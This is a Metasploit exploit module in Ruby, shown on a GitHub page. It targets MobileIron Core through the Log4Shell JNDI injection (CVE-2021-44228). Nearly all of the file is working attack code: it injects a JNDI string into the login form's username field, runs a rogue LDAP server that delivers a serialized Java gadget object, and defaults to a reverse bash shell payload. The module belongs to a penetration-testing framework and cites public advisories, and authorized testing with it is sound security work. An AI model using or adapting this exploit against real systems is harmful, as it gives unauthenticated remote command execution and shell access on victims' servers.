-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
mobileiron_core_log4shell.rb
132 lines (115 loc) · 4.08 KB
/
mobileiron_core_log4shell.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Log4Shell
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(_info = {})
super(
'Name' => 'MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Description' => %q{
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
command execution in the context of the tomcat user.
This module will start an LDAP server that the target will need to connect to.
},
'Author' => [
'Spencer McIntyre', # JNDI/LDAP lib stuff
'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
'rwincey', # discovered log4shell vector in MobileIron
'jbaines-r7' # wrote this module
],
'References' => [
[ 'CVE', '2021-44228' ],
[ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],
[ 'URL', 'https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US' ],
[ 'URL', 'https://www.mandiant.com/resources/mobileiron-log4shell-exploitation' ]
],
'DisclosureDate' => '2021-12-12',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SRVPORT' => 389,
'WfsDelay' => 30
},
'Targets' => [
[
'Linux', {
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
},
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'AKA' => ['Log4Shell', 'LogJam'],
'Reliability' => [REPEATABLE_SESSION],
'RelatedModules' => [
'auxiliary/scanner/http/log4shell_scanner',
'exploit/multi/http/log4shell_header_injection'
]
}
)
register_options([
OptString.new('TARGETURI', [ true, 'Base path', '/'])
])
end
def wait_until(&block)
datastore['WfsDelay'].times do
break if block.call
sleep(1)
end
end
def check
validate_configuration!
vprint_status('Attempting to trigger the jndi callback...')
start_service
res = trigger
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
wait_until { @search_received }
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
ensure
cleanup_service
end
def build_ldap_search_response_payload
return [] if @search_received
@search_received = true
return [] unless @exploiting
print_good('Delivering the serialized Java object to execute the payload...')
build_ldap_search_response_payload_inline('CommonsBeanutils1')
end
def trigger
@search_received = false
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'mifs', 'j_spring_security_check'),
'headers' => {
'Referer' => "https://#{rhost}#{normalize_uri(target_uri, 'mifs', 'user', 'login.jsp')}"
},
'encode' => false,
'vars_post' => {
'j_username' => log4j_jndi_string,
'j_password' => Rex::Text.rand_text_alphanumeric(8),
'logincontext' => 'employee'
}
)
end
def exploit
validate_configuration!
@exploiting = true
start_service
res = trigger
fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302
wait_until { @search_received && (!handler_enabled? || session_created?) }
handler
end
end